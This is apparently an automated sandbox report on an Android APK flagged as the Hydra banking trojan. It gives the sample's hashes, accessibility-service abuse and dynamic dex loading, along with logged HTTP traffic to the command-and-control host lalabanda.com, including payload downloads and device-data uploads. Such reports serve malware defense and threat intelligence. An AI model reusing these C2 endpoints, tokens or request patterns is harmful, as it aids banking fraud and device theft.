hydra | 8b321553f1a269ee4b68a02162ba2d14c71a92907b6001ff3db0fe5bae6b3430

Resubmissions

20/09/2022, 11:42 UTC

220920-nvay7sgean 10

Analysis

max time kernel
1522024s
max time network
155s
platform
android_x86
resource
android-x86-arm-20220823-en
resource tags

androidarch:armarch:x86image:android-x86-arm-20220823-enlocale:en-usos:android-9-x86system
submitted
20/09/2022, 11:42 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8B321553F1A269EE4B68A02162BA2D14C71A92907B6001FF3DB0FE5BAE6B3430.apk
Size

2.8MB
MD5

d1a68785559ae6b0049a2bd1798277a1
SHA1

8ea0706e77e57810ff1bc9073f3701772f032557
SHA256

8b321553f1a269ee4b68a02162ba2d14c71a92907b6001ff3db0fe5bae6b3430
SHA512

b4c676c19dedf7b582598bc8bc9d3bf260b3847564d7da755cf9e694abdf2ad3555da526b7ff847dcbddf75b9d1183924a29078d181b313fcec18c8b5349637a
SSDEEP

49152:Ucz4N3omNn0M+CGN3SPXLD8S/obeUQGkfC1T3Eb0KizuNAGq6BXk2M:LrmR0vCSC/robeZGkfk0xA1XX

Score

10^/10

hydra banker infostealer trojan

Malware Config

Extracted

Family

hydra

http://lalabanda.com

Signatures

Hydra
Android banker and info stealer.
banker trojan infostealer hydra

Hydra payload 2 IoCs

resource	yara_rule
behavioral1/memory/4124-0.dex	family_hydra
behavioral1/memory/4081-0.dex	family_hydra

Makes use of the framework's Accessibility service. 3 IoCs

description	ioc	Process
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfoByAccessibilityId	com.wife.dizzy
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByViewId	com.wife.dizzy
Framework service call	android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByText	com.wife.dizzy

Loads dropped Dex/Jar 2 IoCs

Runs executable file dropped to the device during analysis.

ioc	pid	Process
/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json	4124	/system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json --output-vdex-fd=41 --oat-fd=42 --oat-location=/data/user/0/com.wife.dizzy/app_DynamicOptDex/oat/x86/KCFj.odex --compiler-filter=quicken --class-loader-context=&
/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json	4081	com.wife.dizzy

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	ip-api.com

Reads information about phone network operator.

com.wife.dizzy
1⤵
- Makes use of the framework's Accessibility service.
- Loads dropped Dex/Jar
PID:4081
- /system/bin/dex2oat --instruction-set=x86 --instruction-set-features=ssse3,-sse4.1,-sse4.2,-avx,-avx2,-popcnt --runtime-arg -Xhidden-api-checks --runtime-arg -Xrelocate --boot-image=/system/framework/boot.art --runtime-arg -Xms64m --runtime-arg -Xmx512m --instruction-set-variant=x86 --instruction-set-features=default --inline-max-code-units=0 --compact-dex-level=none --dex-file=/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json --output-vdex-fd=41 --oat-fd=42 --oat-location=/data/user/0/com.wife.dizzy/app_DynamicOptDex/oat/x86/KCFj.odex --compiler-filter=quicken --class-loader-context=&
  2⤵
  - Loads dropped Dex/Jar
  PID:4124

Network

DNS

android.apis.google.com

Remote address:

1.1.1.1:53

Request

android.apis.google.com

IN A

Response

android.apis.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.179.142
DNS

infinitedata-pa.googleapis.com

Remote address:

1.1.1.1:53

Request

infinitedata-pa.googleapis.com

IN A

Response

infinitedata-pa.googleapis.com

IN A

142.251.39.106
DNS

android.apis.google.com

Remote address:

1.1.1.1:53

Request

android.apis.google.com

IN A

Response

android.apis.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.251.36.14
DNS

lalabanda.com

Remote address:

1.1.1.1:53

Request

lalabanda.com

IN A

Response

lalabanda.com

IN A

193.169.245.24
GET

http://lalabanda.com/payload

Remote address:

193.169.245.24:80

Request

GET /payload HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:43:51 GMT
Content-Type: application/octet-stream
Content-Length: 997816
Connection: keep-alive
Last-Modified: Tue, 24 Aug 2021 18:08:05 GMT
ETag: "61253585-f39b8"
Accept-Ranges: bytes
POST

http://lalabanda.com/api/v1/device/update

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/update HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 31
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/mirrors

Remote address:

193.169.245.24:80

Request

GET /api/mirrors HTTP/1.1
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:43:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
Content-Encoding: gzip
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:43:52 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/lock

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/lock HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 18
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:43:52 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:43:52 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device

Remote address:

193.169.245.24:80

Request

POST /api/v1/device HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 134
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device

Remote address:

193.169.245.24:80

Request

POST /api/v1/device HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 3387
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:03 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/storage/zip/jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip

Remote address:

193.169.245.24:80

Request

GET /storage/zip/jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip HTTP/1.1
Range: bytes=0-
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:12 GMT
Content-Type: application/zip
Content-Length: 65705844
Connection: keep-alive
Last-Modified: Mon, 19 Sep 2022 18:03:38 GMT
ETag: "6328aefa-3ea9774"
Content-Range: bytes 0-65705843/65705844
POST

http://lalabanda.com/api/v1/device

Remote address:

193.169.245.24:80

Request

POST /api/v1/device HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 134
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device

Remote address:

193.169.245.24:80

Request

POST /api/v1/device HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 3386
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:45:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:45:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:45:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:45:36 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/push

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/push HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 88
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:45:56 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
GET

http://lalabanda.com/api/v1/device/check?screen=true

Remote address:

193.169.245.24:80

Request

GET /api/v1/device/check?screen=true HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:46:11 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
POST

http://lalabanda.com/api/v1/device/server-log

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/server-log HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 112
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:46:12 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private
DNS

ip-api.com

Remote address:

1.1.1.1:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json

Remote address:

208.95.112.1:80

Request

GET /json HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: ip-api.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Date: Tue, 20 Sep 2022 11:44:02 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
POST

http://lalabanda.com/api/v1/device/update

Remote address:

193.169.245.24:80

Request

POST /api/v1/device/update HTTP/1.1
Authorization: 5eada15f35e0ca2c
Content-Type: application/json
charset: utf-8
Content-Length: 31
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; Pixel 2 Build/PSR1.180720.122)
Host: lalabanda.com
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 11:44:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, private

142.250.179.142:443

android.apis.google.com

tls

867 B
4.6kB
6
5
142.250.179.142:443

android.apis.google.com

tls

919 B
4.5kB
7
4
142.251.39.106:443

infinitedata-pa.googleapis.com

tls

1.4kB
6.1kB
11
12
142.251.36.14:443

android.apis.google.com

tls

4.8kB
8.5kB
16
16
193.169.245.24:80

http://lalabanda.com/api/v1/device/check?screen=true

http

10.4kB
1.0MB
162
253

HTTP Request

GET http://lalabanda.com/payload

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/update

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200
193.169.245.24:80

http://lalabanda.com/api/v1/device/server-log

http

315.1kB
66.4MB
5423
11888

HTTP Request

GET http://lalabanda.com/api/mirrors

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/lock

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200

HTTP Request

GET http://lalabanda.com/storage/zip/jk5xWNYPKnTh4e7LP6vPG8z4YiBmoQYtKefRNId1.zip

HTTP Response

206

HTTP Request

POST http://lalabanda.com/api/v1/device

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/push

HTTP Response

200

HTTP Request

GET http://lalabanda.com/api/v1/device/check?screen=true

HTTP Response

200

HTTP Request

POST http://lalabanda.com/api/v1/device/server-log

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json

http

451 B
672 B
5
4

HTTP Request

GET http://ip-api.com/json

HTTP Response

200
1.1.1.1:853

tls

776 B
3.5kB
10
9
1.1.1.1:853

tls

810 B
4.0kB
9
11
1.1.1.1:853

tls

1.2kB
1.1kB
10
10
193.169.245.24:80

http://lalabanda.com/api/v1/device/update

http

638 B
485 B
6
5

HTTP Request

POST http://lalabanda.com/api/v1/device/update

HTTP Response

200

224.0.0.251:5353

3.7kB
11
1.1.1.1:53

android.apis.google.com

dns

69 B
109 B
1
1

DNS Request

android.apis.google.com

DNS Response

142.250.179.142
1.1.1.1:53

infinitedata-pa.googleapis.com

dns

76 B
92 B
1
1

DNS Request

infinitedata-pa.googleapis.com

DNS Response

142.251.39.106
1.1.1.1:53

android.apis.google.com

dns

69 B
109 B
1
1

DNS Request

android.apis.google.com

DNS Response

142.251.36.14
1.1.1.1:53

lalabanda.com

dns

59 B
75 B
1
1

DNS Request

lalabanda.com

DNS Response

193.169.245.24
1.1.1.1:53

ip-api.com

dns

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json

Filesize
1.3MB

MD5
f84f5fda1df953a8fbe24c17bacdf3ae

SHA1
044b7ca9f5988e175bea21312e81043aa17c9027

SHA256
e31d73a78d821a4ee86e55c77432c3c52ef01a8cb7be18fda83faf50772f7ffa

SHA512
0fb2a6900c79f673df5089ead0bfbbff7582cd17c0094cff3c90cfab2e2f64eb3b1d0ceebb70f6df113b7a68ae13e837477a3e9512efa33530901ccff52bbfd7

Download Submit
/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json

Filesize
3.6MB

MD5
75c36afec3c816acf958b039db4065f4

SHA1
e16d47dc4c597a5b13fed920f367789262ad0162

SHA256
5e5698bbd30997a749fa6e342d8381e042be60c70686fab7f59b151909c39a99

SHA512
eede6c3acb863e7172569fa0814aa65b3c1aac71a46adc4b14f0106de6f63a283b588704b1199ecd0a49321898f745ec9600070d681cff8c4af43b26f6997c5d

Download Submit
/data/user/0/com.wife.dizzy/app_DynamicOptDex/KCFj.json

Filesize
3.6MB

MD5
7135f1564d788d4f037d1fce183fb480

SHA1
d0b34f23799c14770a8b5fc1f1a1d81697bb6f53

SHA256
df7bbead42e925c5b6b349c89c5fa85b8dbd113317acf05fed32243b4827f6b3

SHA512
d4ad950737096138a221850f58180962b5a29e81b4b6866f041f2ca7d3b0d03a2262ce7e081eb71c72d28c057e760521bb986136729be506b934f44ec04ebea2

Download Submit
/data/user/0/com.wife.dizzy/app_apk/payload.apk

Filesize
974KB

MD5
3baeaa766ea7f31a9147208efd957c75

SHA1
c701de3d0e55425394ccbf8e0967639e86f3c54e

SHA256
75e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d

SHA512
9f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.